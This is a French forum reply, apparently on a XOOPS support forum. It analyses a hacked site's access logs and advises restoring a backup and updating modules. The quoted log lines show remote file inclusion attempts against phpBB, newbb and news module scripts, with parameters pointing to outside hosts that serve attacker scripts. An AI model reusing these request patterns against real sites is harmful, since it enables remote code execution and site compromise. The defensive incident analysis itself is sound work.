Juste comme ça au tout premier coup d'oeil, on voit par exemple que tu as eu des tentatives de hack (bot script qui cherche un phpBB)
Citation :
62.73.5.183 - - [13/Feb/2008:22:05:07 +0100] "GET /modules/newbb/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79"
62.73.5.183 - - [13/Feb/2008:22:05:07 +0100] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79"
195.32.96.7 - - [13/Feb/2008:23:02:19 +0100] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79"
83.83.130.192 - - [13/Feb/2008:21:23:44 +0100] "GET /modules/news/comment_reply.php?com_itemid=http://holengirl.eclub.lv/images/me? HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
mais ça n'avait rien donné pour eux bien entendu.
je continue.
Dans les logs du 15, on a ça par exemple (entre autre du même genre):
Citation :
90.53.97.15 - - [14/Feb/2008:09:31:20 +0100] "GET /modules/news/comment_reply.php?com_itemid=http://nsmsisoeueeitsdwfdfhfrdefaiss.land.ru/.html/head? HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
83.86.1.146 - - [14/Feb/2008:12:29:06 +0100] "GET /modules/news/article.php?storyid=http://zaperyan1918moon.chat.ru/html/aboutme? HTTP/1.1" 200 885 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
Avec une erreur 200 il semble que le fichier était présent sur le site russe au moment des faits.
Mais ce n'est plus le cas, impossible donc de savoir que contenant ce fichier et ce qu'il a pu faire.
Es-tu à jour pour ton module de news ?
Citation :
222.239.227.171 - - [13/Feb/2008:16:08:55 +0100] "GET /modules/newbb//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.oneshotmarines.com/includes/echo.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65"
222.239.227.171 - - [13/Feb/2008:16:08:56 +0100] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.oneshotmarines.com/includes/echo.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65"
222.239.227.171 - - [13/Feb/2008:16:09:01 +0100] "GET /modules//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.oneshotmarines.com/includes/echo.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65"
ces tentatives là ont échoué car une erreur 404 leur est retournée.
Pour la journée du 16 il y a d'autres tentatives sur le modules news, mais même chose, les fichiers y étaient ce jour-là mais plus aujourd'hui, donc pas moyen de savoir ce que ces fichiers ont exécuté.
Là ton site est down donc ?
Dans tous les cas, en cas de hack, mis à part trouver par où ils sont passés, le mieux est toujours de restaurer une sauvegarde récente, pour être sûr de ne pas leur laisser une porte d'entrée.
Sans compter la mise à jour de tous les modules et de xoops.
